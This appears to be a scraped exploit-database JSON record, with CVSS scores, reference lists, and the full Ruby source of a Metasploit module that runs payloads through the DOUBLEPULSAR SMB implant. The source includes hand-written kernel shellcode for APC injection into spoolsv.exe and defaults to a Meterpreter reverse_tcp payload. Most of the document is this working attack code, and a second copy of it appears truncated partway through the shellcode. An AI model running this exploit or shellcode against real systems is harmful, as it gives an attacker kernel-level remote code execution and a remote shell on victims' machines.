make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T02:14:49", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e749f81c1854806cb4d4c9c3c463dc50", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-06T00:18:57", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T00:18:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T00:18:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 